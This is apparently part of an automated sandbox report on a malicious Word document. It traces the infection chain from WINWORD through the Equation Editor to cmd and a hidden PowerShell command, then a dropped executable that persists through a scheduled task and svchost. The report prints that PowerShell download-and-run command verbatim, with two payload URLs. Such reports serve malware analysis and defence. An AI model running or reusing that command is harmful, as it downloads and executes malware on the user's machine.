IRP_MJ_SET_EA	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_SYSTEM_CONTROL	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_QUERY_SECURITY	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_SET_QUOTA	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_QUERY_INFORMATION	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_SHUTDOWN	\FileSystem\MRxDAV	81F451DE	new

New Device

Driver	Device	Attached to (upper)	Attached to (lower)
\FileSystem\MRxDAV		unknown	unknown

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3580 Parent PID: 2956

General

Start time:	16:03:24
Start date:	25/05/2018
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\FORMP16T.docx
Imagebase:	0x2f2b0000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: FLTLDR.EXE PID: 3852 Parent PID: 3580

General

Start time:	16:03:38
Start date:	25/05/2018
Path:	C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT
Imagebase:	0x2d2c0000
File size:	120160 bytes
MD5 hash:	92E7D4655C629754D2366E67E68A32F9
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3888 Parent PID: 536

General

Start time:	16:03:39
Start date:	25/05/2018
Path:	C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3912 Parent PID: 3888

General

Start time:	16:03:39
Start date:	25/05/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CmD /C %tmp%\task.bat & UUUUUUUU c
Imagebase:	0x4a580000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 3968 Parent PID: 3912

General

Start time:	16:03:41
Start date:	25/05/2018
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Imagebase:	0x21ab0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: ounehcnaykuL.exe PID: 236 Parent PID: 3968

General

Start time:	16:04:26
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: ounehcnaykuL.exe PID: 2780 Parent PID: 236

General

Start time:	16:05:24
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ounehcnaykuM.exe PID: 2760 Parent PID: 2780

General

Start time:	16:05:25
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: ounehcnaykuM.exe PID: 2992 Parent PID: 2760

General

Start time:	16:06:22
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskeng.exe PID: 2068 Parent PID: 836

General

Start time:	16:07:00
Start date:	25/05/2018
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {4FF6B578-0DC8-43D6-96ED-9BD735AC3890} S-1-5-18:NT AUTHORITY\System:Service:
Imagebase:	0xda0000
File size:	192000 bytes
MD5 hash:	4F2659160AFCCA990305816946F69407
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ounehcnaykuM.exe PID: 2532 Parent PID: 2068

General

Start time:	16:07:00
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: ounehcnaykuM.exe PID: 3060 Parent PID: 2532

General

Start time:	16:08:31
Start date:	25/05/2018
Path:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Imagebase:	0x400000
File size:	270387 bytes
MD5 hash:	A5EB363D44116B6CECB2AA7527FD7A6A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 3144 Parent PID: 3060

General

Start time:	16:09:04
Start date:	25/05/2018
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	svchost.exe
Imagebase:	0xee0000
File size:	20992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Cryptography:

Spam, unwanted Advertisements and Ransom Demands:

Exploits:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Software Vulnerabilities:

Networking:

Remote Access Functionality:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshots

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Public

Private

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

IRP Handler

New Device

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back